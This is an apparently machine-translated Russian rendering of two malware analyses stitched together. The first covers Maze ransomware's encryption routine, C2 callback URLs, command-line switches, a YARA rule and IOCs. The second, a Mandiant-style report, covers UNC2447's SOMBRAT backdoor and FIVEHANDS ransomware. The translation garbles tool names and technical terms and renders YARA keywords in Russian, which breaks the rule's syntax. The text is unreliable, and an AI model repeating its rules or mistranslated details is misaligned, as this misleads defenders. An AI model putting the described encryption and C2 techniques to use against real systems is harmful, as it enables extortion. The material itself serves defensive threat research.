    После этого вредоносная программа запускает процедуру шифрования файлов, поиск по блокам перед импортом открытого BLOB-ключа RSA, сгенерированного во время выполнения. После этого он создает записку о выкупе, подготовленную для этой зараженной машины, в корневой папке, а затем начинает искать папки и файлы для шифрования.

    РИСУНОК 22. СОЗДАНИЕ ЗАПИСКИ О ВЫКУПЕ В КОРНЕВОЙ ПАПКЕ И ПОИСК ПАПКИ И ФАЙЛОВ

    Пример записки о выкупе с некоторыми анонимными данными показан ниже:

    РИСУНОК 23.ПРИМЕР ЗАПИСКИ О ВЫКУПЕ В ЛАБИРИНТЕ

    Процедура шифрования файлов проста, вредоносная программа выполняет следующие действия:

    • Проверить наличие файла функцией «SetFileAttributesW» с атрибутом «FILE_ATTRIBUTE_ARCHIVE».
    • Зарезервировать память под файл с вызовом «Virtual Alloc» для ключа и iv.
    • Открыть файл с правами на чтение и запись функцией «CreateFileW» с флагом «OPEN_EXISTING».
    • Получить размер файла с помощью функции «GetFileSizeEx» (это важно для управления большими файлами, «GetFileSize» не годится для больших файлов).
    • Создайте сопоставление файлов с помощью функций «CreateFileMappingW» и «MapViewOfFile»
    • Сгенерировать случайный ключ размером 32 байта с помощью функции «CryptGenRandom».
    • Сгенерировать случайный iv из 8 байт с помощью функции «CryptGenRandom».
    • Зарезервируйте 264 байта памяти с помощью функции «VirtualAlloc».
    • Создать новое случайное расширение для файла-жертвы. Каждый файл имеет другое расширение, но исходное расширение не теряется; новый добавляется к старому.Например, «1.zip» становится «1.zip.gthf».
    • Зашифруйте файл с помощью алгоритма ChaCha и ключа и iv с помощью открытого ключа RSA, сгенерированного во время выполнения.
    • Запишите этот новый блок с ключом и iv для расшифровки в конце файла.
    • Переименуйте файл с помощью функции «MoveFileExW». Таким образом, невозможно использовать криминалистические инструменты для восстановления файлов, поскольку они используют один и тот же сектор на необработанном диске. Вредоносное ПО не удаляет файл с помощью функции «DeleteFileW», а затем создает новый с зашифрованными данными.Вместо этого все изменения применяются в отображении напрямую, в памяти, без использования файлового указателя на диске для чтения и записи, что значительно ускоряет процесс.
    • Образ файла не сопоставлен, а дескрипторы закрыты.
    • Процесс повторяется с новыми файлами.

    Список папок, которые избегает вредоносное ПО:

    • Главный каталог Windows.
    • Игры
    • Браузер Tor
    • Данные программы
    • кеш2\записи
    • Низкий\Содержание.IE5
    • Данные пользователя\По умолчанию\Кэш
    • Все пользователи
    • Локальные настройки
    • AppData\локальный
    • Файлы программы

    Вредоносная программа игнорирует следующие расширения файлов:

    Вредоносная программа также имеет список имен файлов, которые не будут шифроваться:

    • инф
    • ини
    • ини
    • от
    • дб
    • бак
    • дат.лог
    • дб
    • бин
    • РАСШИФРОВАТЬ ФАЙЛЫ.txt

    Однако он шифрует файл «ntuser.ini», чтобы предотвратить его шифрование другими программами-вымогателями. Он создает записку о выкупе в каждой папке, которую может.

    Когда вредоносная программа завершает шифрование всех файлов, она меняет обои рабочего стола на это изображение:

    РИСУНОК 24. ВРЕДОНОСНАЯ ПРОГРАММА МЕНЯЕТ ОБОИ РАБОЧЕГО СТОЛА ПОСЛЕ ЗАШИФРОВАНИЯ ФАЙЛОВ

    Вредоносная программа пытается подключиться к IP-адресам, которые были зашифрованы в двоичном коде, чтобы отправить информацию о зараженной машине, как показано ниже:

     

    хххр://91.218.114.4/nwjknpeevx.action?pw=g1y652l&kyn=21y3vvhh&dvr=5e&us=g25e3582a

    hxxp://91.218.114.11/forum/siaib.jspx?v=h&xyna=0vip863&eul=xsn3q0

    hxxp://91.218.114.26/view/ticket/pigut.jspx?o=664quo0s&fp=ot52

    hxxp://91.218.114.25/xrr.jspx?ygad=r35e2cx&e=6as6ta

    хххр://91.218.114.4/j.php

    hxxp://91.218.114.11/payout/view/fa.aspx?y=y&qbx=4&kws=n2&iuy=8k7

    hxxp://91.218.114.25/lxh.asp?mtxm=l7&r=836wy5

    хххр://91.218.114.26/signin/ticket/eq.action?x=yk6rr&e=50b&q=327dr5&ofk=065cdp

    hxxp://91.218.114.31/signin/rnmnnekca.jsp?kdn=6snl5&e=7a50cx4hyp

    hxxp://91.218.114.31/forum/a.aspx?byx=56&bc=62t0h&u=75w6n6&sot=2v0l761or6

    hxxp://91.218.114.32/withdrawal/checkout/l.do?nuny=qj6&sdv=45g2boyf5q&dnr=rh8lk31ed

    hxxp://91.218.114.77/task/bxfbpx.jspx?nq=cge63

    hxxp://91.218.114.38/account/payout/ujwkjhoui.shtml

    хххр://91.218.114.37/imrhhjitop.phtml?wto=344dsc84&sp=x&oml=c173s71u&iy=m3u2

    hxxp://91.218.114.38/auth/логин

    hxxp://91.218.114.79/logout/hfwdmugdi.php?upaj=mj7g

    hxxp://91.218.114.38/sepa/juel.php?ars=51qse4p3y&xjaq=r5o4t4dp

    hxxp://91.218.114.32/fwno.cgi?yd=410&o=y7x5kx371&p=m3361672

    hxxp://91.218.114.37/sepa/signout/mjsnm.aspx?r=7o47wri&rtew=uu8764ssy&bri=51gxx6k5&opms=72gy0a

    хххр://91.218.114.77/payout/analytics/lrkaaosp.do?y=62h&aq=3jq8k6&v=0svt

    hxxp://91.218.114.79/create/dpcwk.php?u=28qy0dpmt&qwbh=k&f=g1ub5ei&ek=3ee

     

    Важно принять во внимание, что вредоносное ПО подделывает строку POST, чтобы сделать соединение случайным выбором из списка возможных строк, таких как «форум», «php», «просмотр» и т. д., чтобы затруднить обнаружение с IPS или другими фильтрами в сети.

    Определены IP-адреса из Российской Федерации, но это не доказывает, что вредоносное ПО пришло из этой страны; это могло быть преднамеренным введением в заблуждение, но с языковыми проверками стран СНГ это, безусловно, представляется возможным.

    Использование IP-адресов вместо доменных имен позволяет избежать разрешений DNS, которые могут быть изменены или перенаправлены на петлю, например, с помощью файла «host» в Windows. Это усложняет отслеживание IP-адресов и позволяет избежать блокировки соединения.

    Вредоносное ПО использует этот агент для установления соединения, но он может меняться между образцами:

    РИСУНОК 25. АГЕНТ, ИСПОЛЬЗУЕМЫЙ ДЛЯ ПОДКЛЮЧЕНИЯ К IP-АДРЕСАМ C2C

    Из дампа памяти мы можем извлечь IP-адреса, используемые этими подключениями, а также любопытную строку, которая говорит о Лоуренсе Абрамсе, администраторе веб-сайта «bleepingcomputer», с которым напрямую связались разработчики.Неизвестно, почему они указали этот адрес электронной почты, потому что он не имеет отношения к записке о выкупе и больше нигде не используется. Возможно, это способ издеваться над администратором сайта, который часто сообщает о программах-вымогателях?

    РИСУНОК 26. IP-АДРЕСА C2C, ИЗВЛЕЧЕННЫЕ ИЗ ПАМЯТИ

    Соединения с IP-адресами C2C в pcap с помощью Wireshark видны отлично:

    РИСУНОК 27. СОЕДИНЕНИЕ В PCAP С IP-АДРЕСАМИ C2C

    Лабиринт имеет в памяти несколько интересных строк, которые, возможно, заслуживают дальнейшего анализа в будущем:

    РИСУНОК 28.ЛЮБОПЫТНАЯ СТРУНА ДЛЯ БУДУЩЕГО ИССЛЕДОВАНИЯ

    Веб-страница для осуществления платежа, запрошенного в записке о выкупе, показывает цену и подтверждает, что все правильно.

    РИСУНОК 29. ВЕБ-СТРАНИЦА ПЛАТЕЖА MAZE ПОСЛЕ РАСШИФРОВКИ ЗАПИСКИ О ВЫКУПЕ

    Maze имеет функцию чата для связи с операторами и получения информации о том, как получить криптовалюту, необходимую для совершения платежа.

    Конечно, как и в случае со многими типами программ-вымогателей, есть предложение расшифровать три изображения бесплатно, и эта услуга проверена как работающая:

    РИСУНОК 30.БЕСПЛАТНОЕ РАСШИФРОВАНИЕ РАБОТАЕТ, ПОЭТОМУ ОБРАЗЕЦ ВРЕДОНОСНОГО ПО ПРАВИЛЬЕН

    ВЫКЛЮЧАТЕЛИ

    Вредоносная программа имеет некоторые переключатели, которые можно использовать в командной строке для запуска. Эти переключатели могут либо отключить некоторые элементы, либо включить ведение журнала.

    Переключатели:

    • —nomutex -> Этот переключатель предотвращает проверку мьютекса, чтобы он мог запускать более одного экземпляра на одном компьютере. Его также можно использовать, чтобы избежать вакцин, которые создаются до того, как вредоносное ПО создаст имя мьютекса на машине.
    • —noshares -> С этим параметром вредоносное ПО не будет шифровать сетевые ресурсы, а только локальный компьютер.
    • –path x -> Где x — полный путь. В этом случае вредоносная программа будет шифровать все файлы во всех папках, начиная с этого пути, если они не являются именами, расширениями или именами папок из черного списка. Это полезно для разработчиков вредоносных программ, чтобы атаковать специальный путь вместо того, чтобы тратить время на полную машину, и это делает атаку более целенаправленной.
    • –logging -> Если этот переключатель включен, вредоносное ПО будет регистрировать все свои действия.Полезно для разработчиков вредоносного ПО в средах отладки или на этапе атаки знать, что все было в порядке, шаг за шагом. Вот небольшой пример этой информации:

    РИСУНОК 31. ПРИМЕР ИНФОРМАЦИИ, КОТОРУЮ ВРЕДОНОСНОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ МОЖЕТ ВЫДАВАТЬ С ПОМОЩЬЮ LOG SWITCH

    ДРУГИЕ ОБРАЗЦЫ

    В январе 2020 года появилась новая версия зловреда со специальным текстом, посвященным некоторым исследователям в области безопасности. Разработчики вредоносного ПО, похоже, выбрали этих людей, чтобы провоцировать и высмеивать их.

    Образец был обнаружен malwrhunterteam[9] 28 января 2020 года. Образец имеет некоторые отличия по сравнению с предыдущим, который был проанализирован в этом отчете. Эти различия будут учтены позже с помощью другого образца, который был найден Лукой Надь[10] 30 января 2020 года.

    Самое главное здесь то, что разработчики, похоже, тщательно отбирали исследователей и ждали их ответа в качестве психологического трюка, и это сработало, потому что все они ответили, тролля разработчиков вредоносного ПО по поводу версии их вредоносного ПО, обнаруженного на двадцать восьмое.

    Вот один из ответов разработчика вредоносного ПО на этот троллинг, содержащий несколько интересных фактов:

    РИСУНОК 32. ОТВЕТ ОТ РАЗРАБОТЧИКА ВРЕДОНОСНОГО ПО

    • Неизвестно, стоит ли за вредоносным ПО один человек или нет. Любопытно, что они дважды сказали «я» вместо «мы» в своем ответе. Так что, возможно, это было написано одним человеком в целях троллинга, или, возможно, разработчиком вредоносного ПО действительно является только один человек (или они хотят, чтобы исследователи думали, что это так).
    • Еще один важный факт в заметке — рассказ об инструментах, которые один из исследователей использует для регулярного анализа вредоносного ПО. Почему они упоминают регулярный анализ вредоносных программ? Это потому, что они сами реверсируют вредоносное ПО для развлечения, или это может быть их повседневная работа? Может быть, разработчик — исследователь (из-за того, как они разговаривают с другими и провоцируют их)? Во-вторых, не раз упоминается анализ вредоносного ПО, и, в-третьих, они сказали, что сделали скрипт IDAPython для удаления всего обфусцированного кода, который есть у вредоносного ПО (вымогатель, возможно, получил название «Лабиринт» из-за того, что его анализ похож на прогулку). через лабиринт).Так что, это может быть либо исследователь, хорошо знающий IDAPro, либо продвинутый разработчик (а обфусцированный код в Maze сделан очень хорошо), а может быть, это разработчик, у которого в обычной жизни есть другая работа, помимо создания вредоносных программ? Конечно, это всего лишь возможности, а не факты.
    • Разработчик вредоносного ПО достиг своей цели с помощью этого взаимодействия, так как его целевая аудитория увидела ответ и рассказала о своем вредоносном ПО, как отмечено в последней строке их ответа: «… но вы должны знать, что мы любим вас, исследователи, без вас наша работа также была бы быть чертовски скучным».

    Любопытно, что здесь по-прежнему говорили «мы» вместо «я», а может быть, речь шла о разработке всех вредоносных программ?

    Отличия этих образцов:

    • Обычно поставляется в виде DLL, а не EXE-файла. Он не работает в операционных системах Windows старше Vista, поскольку это усложняет анализ. Используя вредоносное ПО как DLL, они могут легче внедрить этот модуль в целевой процесс, чем если бы они использовали EXE-образец вредоносного ПО.
    • Вместо удаления «теневых томов» разработчики используют WMIC со специальной уловкой пути, как упоминалось ранее, используя классы WMIC для управления теневыми томами. Пример такого использования можно увидеть на следующем изображении.

    РИСУНОК 33. ИСПОЛЬЗОВАНИЕ КЛАССОВ WMIC, ЕСЛИ НЕОБХОДИМО ПОЛУЧИТЬ ТЕНЕВЫЕ ОБЪЕМЫ

    Каждый образец вредоносного ПО использует разные строки в качестве PDB для отправки сообщений или для того, чтобы сделать образец уникальным, например:

    • C:\somerandomsh**\sh**\obama.пдб
    • C:\kill\yourself\<псевдоним>\chinese\idio*.pdb

    (В этих примерах некоторые элементы были удалены или изменены для удаления конфиденциальной информации из отчета).

    Новые образцы, обнаруженные в январе 2020 года, имеют следующие связи с C2 (или пытаются их установить):

    РИСУНОК 34. ПОДКЛЮЧЕНИЯ К C2 IP НОВЫХ ОБРАЗЦОВ

    Как видим, это те же IP-адреса, что и в предыдущих версиях зловреда.

    Даты компиляции образцов с 24 января 2020 года (первая версия со строками, которые спровоцировали исследователей) по 28 января 2020 года (версия с ответами исследователям), то есть они были сделаны в один и тот же день ответы на предыдущую версию были опубликованы в Twitter.

    Еще один интересный факт из более позднего образца заключается в том, что, помимо того, что он говорит о том, что код языка, используемый для его программирования, был корейским, IP-адреса, к которым он подключается, по-прежнему принадлежат Российской Федерации, как видно на следующих двух изображениях.

    РИСУНОК 35. КОД ЯЗЫКА «ИСПОЛЬЗУЕТСЯ» В ОБРАЗЦЕ ПАКЕРА, А НЕ ВРЕДОНОСНОМ ПО

    РИСУНОК 36. ВСЕ ДОМЕНЫ C2 ПРИНАДЛЕЖАТ РОССИЙСКОЙ ФЕДЕРАЦИИ

    Невозможно узнать правду, но это может быть уловкой, чтобы попытаться ввести исследователей в заблуждение, заставив думать, что вредоносное ПО происходит из какой-то страны, тогда как на самом деле оно происходит из другой.Известно, что разработчики вредоносного ПО часто проверяют язык на машинах потенциальных жертв, чтобы избежать стран СНГ, поэтому можно предположить, что проверка на «корейский» язык была уловкой, рассчитанной на введение в заблуждение, но точно знать это невозможно. Конечно, «корейский» язык можно поменять вручную, а может это и корейский упаковщик, но с уверенностью сказать нельзя.

    ЗАКЛЮЧЕНИЕ

    Maze — это программа-вымогатель, созданная опытными разработчиками. Он использует много трюков, чтобы сделать анализ очень сложным, отключая дизассемблеры и используя плагины псевдокода.

    Это представляет большую проблему для частных лиц и предприятий, которые не платят, поскольку разработчики угрожают раскрыть информацию, если они не получат платеж, и они действительно держат свое слово в этом. Все больше и больше программ-вымогателей демонстрируют такое же поведение, и мы ожидаем увидеть больше таких программ в этом году и, возможно, в будущем.

    Разработчики вредоносных программ активны в социальных сетях, таких как Twitter, и знакомы с работой исследователей вредоносных программ.Также они отлично умеют их провоцировать и любят играть с ними в кошки-мышки.

    Мы рекомендуем делать периодические резервные копии файлов и держать их изолированными от сети, а также иметь постоянно обновляемый антивирус. Также следует применить последнее программное исправление. Следует избегать ненужных подключений к удаленному рабочему столу.

    Избегайте подозрительных электронных писем и не открывайте вложения, полученные от неизвестных вам лиц. То же самое касается ссылок в электронных письмах, и даже если они исходят из известного источника, уточните у отправителя, если у вас есть какие-либо сомнения.Кроме того, отключите макросы в программах Office и никогда не включайте их, если в этом нет необходимости.

    ПОКРЫТИЕ

    McAfee обеспечивает защиту от этой угрозы во всех своих продуктах, включая персональный антивирус, конечные точки и шлюзы.

    Возможные имена:

    ПРАВИЛО YARA

    правило maze_unpacked {

       мета:

          description = «Правило обнаружения неупакованных образцов Maze»

          author = “Marc Rivero | Команда McAfee ATR»

        

       строки:

          $opcode_sequence = { 5589e583ec208b450c8b4d08c745fc00 }

     

                     $opcode_sequence_2 = { 5589e553575683e4f883ec28c7042400 }

     

                     $opcode_sequence_3 = { 5589e55dc3662e0f1f84000000000090 }

     

                     $opcode_sequence_4 = { 5589e553575683e4f081ec600200008b }

     

                     $opcode_sequence_5 = { 5589e553575683e4f081ecc00000000f }

     

                     $opcode_sequence_6 = { 5589e583ec208b45108b4d0c8b550883 }

     

                     $opcode_sequence_7 = { 5589e5575683ec388b45108b4d0c8b55 }

     

                     $opcode_sequence_8 = { 5589e5575683e4f883ec088b45088b48 }

     

                     $opcode_sequence_9 = { 558b6c241468997a41000f84bdc50000 }

     

                     $opcode_sequence_10 = { 5589e553575683e4f883ec588b5d088b }

     

                     $opcode_sequence_11 = { 5589e553575683e4f083ec408a42048b }

     

                     $opcode_sequence_12 = { 5589e583ec188b4508837d08008945fc }

     

                     $opcode_sequence_13 = { 5589e553575683e4f8b8d05b0000687f }

     

                     $opcode_sequence_14 = { 5589e5508b450831c98945fc89c883c4 }

     

                     $opcode_sequence_15 = { 5589e553575683e4f883ec708b5d0889 }

                     

                     $opcode_sequence_16 = { 5589e583ec308b45088b4d08894df883 }

     

                     $opcode_sequence_17 = { 5589e553575683e4f881ec18030000f2 }

     

                     $opcode_sequence_18 = { 5589e583ec188b45088b4d08894df48b }

     

                     $opcode_sequence_19 = { 5589e583ec2056be74c14400566a0068 }

     

                     $opcode_sequence_20 = { 5589e553575683e4f081ec

    0008b }

     

                     $opcode_sequence_21 = { 5589e583e4f083ec208b4d108b450c0f }

     

                     $opcode_sequence_22 = { 5589e55383e4f883ec108b4d0c8b4508 }

     

                     $opcode_sequence_23 = { 558b8e150409133f03fd08f81b0c4f22 }

     

                     $opcode_sequence_24 = { 5589e553575683e4f883ec7031f68379 }

     

                     $opcode_sequence_25 = { 5589e553575683e4f881ec3001000089 }

     

                     $opcode_sequence_26 = { 5589e553575683e4f881ece00000000f }

     

                     $opcode_sequence_27 = { 558b589608361d1943a57d0ba6492beb }

     

                     $opcode_sequence_28 = { 5589e553575683e4f883ec1089ce6a00 }

     

                     $opcode_sequence_29 = { 5589e5575683e4f883ec688b75088b7d }

     

                     $opcode_sequence_30 = { 5589e553575683e4f883ec386a006a00 }

     

                     $opcode_sequence_31 = { 558b7c240868dca8440057683d484300 }

     

                     $opcode_sequence_32 = { 5589e55683e4f881ec2801000089ce8d }

     

                     $opcode_sequence_33 = { 5589e583ec188b450831c98b5508c704 }

     

                     $opcode_sequence_34 = { 5589e583ec308b450c8b4d088b55088b }

     

                     $opcode_sequence_35 = { 5589e583ec348b450831c983c1188b55 }

     

                     $opcode_sequence_36 = { 5589e553575683e4f881ec78040000f2 }

     

                     $opcode_sequence_37 = { 5589e583ec108b4508837d08008945f8 }

     

                     $opcode_sequence_38 = { 5589e583ec348b4508837d08008945dc }

     

                     $opcode_sequence_39 = { 5589e55683ec548b45088b4d08894df0 }

     

                     $opcode_sequence_40 = { 558bec5de9a48efeffe9ef8efeffcccc }

     

                     $opcode_sequence_41 = { 5589e553575683ec108b45108b4d0c8b }

     

                     $opcode_sequence_42 = { 5589e5575683ec348b4508c745f40100 }

     

                     $opcode_sequence_43 = { 558bec8325a0c345000083ec1c5333db }

     

                     $opcode_sequence_44 = { 5589e553575683e4f083ec208b750c0f }

     

                     $opcode_sequence_45 = { 5589e583ec348b450c8b4d088b55088b }

     

                     $opcode_sequence_46 = { 558b6fd8d843ef516154e2526781aecd }

     

       условие:

     

          ( uint16(0) == 0x5a4d) и 38 из них

    }

    МОК

    Сеть

    Домен          mazedecrypt.топ

    IP                     91.218.114.11

    IP                     91.218.114.25

    IP                     91.218.114.26

    IP                     91.218.114.31

    IP                     91.218.114.32

    IP                     91.218.114.37

    IP                     91.218.114.38

    IP                     91.218.114.4

    IP                     91.218.114.77

    IP                     91.218.114.79

    ПОКРЫТИЕ MITRE ATT&CK

    • Общеиспользуемый порт
    • StandardApplicationLayerProtocol
    • SecuritySoftwareDiscovery
    • SystemTimeDiscovery
    • Интерфейс командной строки
    • Данные зашифрованы
    • Датаэнкриптедфоримпакт
    • Реестр запросов
    • Зацеп

    [1] https://twitter.com/jeromesegura/status/1133767240686288896

    [2] https://www.bleepingcomputer.com/news/security/maze-ransomware-demands-6-million-ransom-from-southwire/

    [3] https://www.bleepingcomputer.com/news/security/nemty-ransomware-to-start-leaking-non-paying-victims-data/

    [4] https://twitter.com/McAfee_Labs/status/1206651980086685696

    [5] https://www.bleepingcomputer.com/news/security/new-threat-actor-impersonates-govt-agencies-to-deliver-malware/

    [6] https://securityintelligence.com/news/spelevo-ek-exploits-flash-player-vulnerability-to-deliver-maze-ransomware/

    [7] https://github.com/revsic/AntiDebugging

    [8] https://ss64.com/locale.html

    [9] https://twitter.com/malwrhunterteam/status/1222253947332841472

    [10] https://twitter.com/luca_nagy_/status/122281

    44522500

    UNC2447 Программы-вымогатели SOMBRAT и FIVEHANDS: изощренная финансовая угроза

    Компания Mandiant обнаружила агрессивную финансово мотивированную группу UNC2447, которая использовала одну уязвимость нулевого дня SonicWall VPN до выпуска исправления и развертывала сложное вредоносное ПО, о котором ранее сообщалось другими поставщиками как SOMBRAT.Mandiant связывает использование SOMBRAT с развертыванием программ-вымогателей, о которых ранее не сообщалось публично.

    UNC2447 монетизирует вторжения, сначала вымогая деньги у своих жертв с помощью программы-вымогателя FIVEHANDS, а затем агрессивно оказывая давление через угрозы внимания средств массовой информации и предлагая данные жертв для продажи на хакерских форумах. UNC2447 был замечен в атаках на организации в Европе и Северной Америке и постоянно демонстрировал расширенные возможности для уклонения от обнаружения и минимизации криминалистической экспертизы после вторжения.

    Компания Mandiant обнаружила доказательства того, что аффилированные лица UNC2447 ранее использовали программу-вымогатель RAGNARLOCKER. Основываясь на технических и временных наблюдениях за развертыванием HELLOKITTY и FIVEHANDS, Mandiant подозревает, что HELLOKITTY могла использоваться общей партнерской программой с мая по декабрь 2020 года, а FIVEHANDS примерно с января 2021 года.

    Фон

    В ноябре 2020 года компания Mandiant создала UNC2447, неклассифицированную группу, которая использовала новый дроппер PowerShell WARPRISM для установки BEACON на двух клиентах Mandiant Managed Defense.Mandiant Managed Defense быстро нейтрализовала эти вторжения и не зафиксировала попыток развертывания программ-вымогателей.

    В январе и феврале 2021 года компания Mandiant Consulting наблюдала за переписыванием романа DEATHRANSOM, получившего название FIVEHANDS, вместе с SOMBRAT у нескольких жертв, подвергшихся вымогательству. Во время одного из вторжений программы-вымогателя были обнаружены те же самые образцы WARPRISM и BEACON, которые ранее были сгруппированы под UNC2447. Mandiant удалось с помощью судебной экспертизы связать использование WARPRISM, BEACON, SOMBRAT и FIVEHANDS с одним и тем же актером.

    Mandiant подозревает, что активность HELLOKITTY в конце 2020 года может быть связана с общей партнерской программой и что с января 2021 года использование программ-вымогателей FIVEHANDS переместилось на FIVEHANDS.

    • В апреле 2021 года Mandiant наблюдал за частным чатом FIVEHANDS TOR с фавиконкой HELLOKITTY (рис. 1).
    Рис. 1. Значок Hello Kitty FIVEHANDS

    Когда Mandiant обнаруживает партнерскую программу-вымогатель, кластеры без категорий назначаются на основе используемой инфраструктуры, а в случае UNC2447 они основывались на инфраструктуре SOMBRAT и Cobalt Strike BEACON, использовавшейся в ходе 5 вторжений между ноябрь 2020 и февраль 2021.Как правило, Mandiant проявляет осторожность даже в отношении новых вредоносных программ, таких как SOMBRAT и WARPRISM, и каждый из кластеров использует строго в соответствии со всей наблюдаемой активностью. Для получения дополнительной информации об угрозах без категорий см. нашу публикацию «Атрибуция DebUNCing: как Mandiant отслеживает субъектов угроз без категорий».

    Уязвимость устройства SonicWall SMA серии 100

    CVE-2021-20016 — это критическая уязвимость SQL-инъекций, которая использует неисправленные продукты удаленного доступа SonicWall Secure Mobile Access серии 100.Удаленный злоумышленник, не прошедший проверку подлинности, может отправить специально созданный запрос, чтобы воспользоваться уязвимостью. Успешная эксплуатация предоставит злоумышленнику возможность доступа к учетным данным для входа (имя пользователя, пароль), а также к информации о сеансе, которую затем можно использовать для входа в уязвимое неисправленное устройство серии SMA 100. Эта уязвимость затронула только серию SMA 100 и была исправлена ​​SonicWall в феврале 2021 года. Дополнительные сведения об этой уязвимости см. в бюллетене SonicWall PSIRT SNWLID-2021-0001.

    ВОЕННЫЙ ПРИЗМ

    WARPRISM — это дроппер PowerShell, который, по наблюдениям Mandiant, доставляет SUNCRYPT, BEACON и MIMIKATZ. WARPRISM используется для уклонения от обнаружения конечной точки и загружает полезную нагрузку непосредственно в память. WARPRISM может использоваться несколькими группами.

    FOXGRABBER

    FOXGRABBER — это утилита командной строки, используемая для сбора файлов учетных данных FireFox из удаленных систем. Он содержит путь PDB: C:\Users\kolobko\Source\Repos\grabff\obj\Debug\grabff.пдб. FOXGRABBER также был замечен во вторжении программ-вымогателей DARKSIDE.

    Мягкие профили BEACON

    На начальных этапах вторжения UNC2447 использует имплантат Cobalt Strike BEACON HTTPSSTAGER для обеспечения постоянной связи с командно-контрольными (C2) серверами по HTTPS и наблюдался с использованием гибких профилей «chches_APT10» и «Havex».

    UNC2447 Ящик для инструментов

    На этапе разведки и эксфильтрации вторжений UNC2447 наблюдался с использованием следующих инструментов: ADFIND, BLOODHOUND, MIMIKATZ, PCHUNTER, RCLONE, ROUTERSCAN, S3BROWSER, ZAP и 7ZIP.UNC2447 может изменить настройки безопасности Windows, правила брандмауэра и антивирусную защиту.

    СОМБРАТ Обзор
    Blackberry Cylance впервые сообщила о

    SOMBRAT в ноябре 2020 года как «Кампания CostaRicto: кибершпионаж на аутсорсинге» как о потенциальной преступной группе, занимающейся шпионажем по найму. В настоящее время Mandiant наблюдает за SOMBRAT наряду с вторжениями программ-вымогателей FIVEHANDS.

    Бэкдор SOMBRAT упакован в виде 64-битного исполняемого файла Windows. Он взаимодействует с настраиваемым сервером управления и контроля (C2) по нескольким протоколам, включая DNS, TCP с шифрованием TLS и, возможно, WebSockets.Хотя бэкдор поддерживает десятки команд, большинство из них позволяют оператору манипулировать зашифрованным файлом хранилища и переконфигурировать имплант. Основная цель бэкдора — загрузка и выполнение плагинов, предоставляемых через сервер C2. В отличие от версии SOMBRAT, опубликованной в ноябре 2020 года, в Mandiant наблюдались дополнительные запутывания и защита, чтобы избежать обнаружения, этот вариант SOMBRAT был усилен, чтобы препятствовать анализу. Метаданные программы, обычно включаемые компилятором, были удалены, а строки встроены и закодированы с помощью подпрограмм на основе XOR.

    Пусковая установка СОМБРАТ

    Этот вариант бэкдора SOMBRAT должен быть развернут вместе с четырьмя дополнительными ресурсами, которые служат пусковыми установками. Обычно они устанавливаются в жестко заданный путь к каталогу `C:\ProgramData\Microsoft`.

    • путь: `C:\programdata\Microsoft\WwanSvc.bat` — средство запуска для `WwanSvc.txt`
    • путь: `C:\programdata\Microsoft\WwanSvc.txt` — декодер и программа запуска для `WwanSvc.c`
    • путь: `C:\programdata\Microsoft\WwanSvc.c` — декодер и программа запуска для `WwanSvc.б`
    • путь: `C:\programdata\Microsoft\WwanSvc.a` — ключ XOR
    • путь: `C:\programdata\Microsoft\WwanSvc.b` — закодированный бэкдор SOMBRAT
    • путь: `%TEMP%\<возможно уникальное случайное имя>` — файл зашифрованного хранилища
    • путь: `%TEMP%\<возможно уникальное случайное имя _<целое число>` — файл зашифрованного хранилища
    • путь: `C:\ProgramData\<возможно уникальное случайное имя ` - зашифрованный файл конфигурации

    Были обнаружены другие варианты имен файлов, такие как ntuser и wapsvc.

    СОМБРАТ Технические детали

    Бэкдор SOMBRAT написан на современном C++ и реализован в виде набора «плагинов», которые взаимодействуют друг с другом. С этим вариантом распространяется пять подключаемых модулей: `core`, `network`, `storage`, `taskman` и `debug` (плагин `config`, описанный Blackberry, отсутствует). Основные плагины взаимодействуют с сервером C2 через сообщения, отправляемые через общий сетевой уровень; каждый плагин поддерживает свой собственный набор сообщений, а протокол бэкдора может быть расширен за счет динамически загружаемых плагинов.

    Плагин `core` координирует отслеживание состояния, например подключение к сети, а также динамическую загрузку и выгрузку плагинов. Плагин `network` настраивает сетевой уровень, используемый для связи с сервером C2, например, позволяя оператору переключаться между протоколами DNS и TCP. Плагин `storage` предоставляет логические операции, такие как чтение и запись, для зашифрованного файла, используемого для хранения плагинов, ресурсов и произвольных данных. Плагин Taskman позволяет оператору просматривать и убивать процессы в скомпрометированной системе.Наконец, плагин `debuglog` поддерживает единственную команду для записи отладочных сообщений.

    Учитывая, что основные плагины не позволяют оператору напрямую выполнять произвольные команды или перенастраивать систему, основной функцией бэкдора SOMBRAT является загрузка плагинов, предоставляемых через сервер C2. Эти плагины могут быть динамически загружаемыми модулями шеллкода или DLL. Сервер C2 может указать бэкдору загрузить плагины напрямую или сохранить их в зашифрованном файле хранилища, откуда они впоследствии могут быть перезагружены, например, после обновления бэкдора.

    Рис. 2. Пометка автора вредоносного ПО «Никто не идеален, кроме меня».

    SOMBRAT избегает криминалистического анализа, исправляя память процесса, используемую для записи аргументов командной строки. Он заменяет исходную командную строку базовым именем исполняемого файла программы, удаляя все аргументы. Это означает, что следователи, которые изучают список процессов с помощью криминалистики памяти, увидят безобидную на вид командную строку «powershell.exe», а не ссылки на необычное имя файла, такое как «WwanSvc.c».

    Сетевые коммуникации СОМБРАТ

    Бэкдор SOMBRAT может обмениваться данными со своим C2-сервером, используя как DNS, так и прокси-сервер с зашифрованным потоковым протоколом TLS.По умолчанию бэкдор использует протокол DNS; однако это может быть перенастроено сервером C2. Компания Mandiant наблюдала за доменами feticost[.]com и celomito[.]com, используемыми для связи DNS C2.

    Когда бэкдор обменивается данными через свой протокол DNS, он создает и разрешает полные доменные имена, интерпретируя результаты DNS для извлечения сообщений C2. Полномочный DNS-сервер встраивает данные в поле IP-адреса результатов записи DNS A и в поле администратора имени результатов записи DNS TEXT.Делая множество запросов к уникальным субдоменам домена C2, бэкдор может медленно передавать информацию по несколько байтов за раз.

    Сходства программ-вымогателей

    Начиная с октября 2020 года, Mandiant наблюдал образцы модифицированной версии DEATHRANSOM. В этой новой модифицированной версии удалена функция проверки языка (на рис. 3 показана проверка языка в DEATHRANSOM).

    Рисунок 3. Языковая проверка из блога Fortinet
    • Программа-вымогатель HELLOKITTY, используемая для атаки на польского разработчика видеоигр CD Projekt Red, как сообщается, создана на основе DEATHRANSOM.
      • HELLOKITTY назван в честь мьютекса HELLOKITTYMutex, используемого при запуске исполняемого файла вредоносного ПО (см. рис. 4).
    Рис. 4. Мьютекс HELLOKITTY, показанный в Process Explorer

    В январе 2021 года компания Mandiant обнаружила новую программу-вымогатель, развернутую против жертвы, и присвоила ей имя FIVEHANDS.

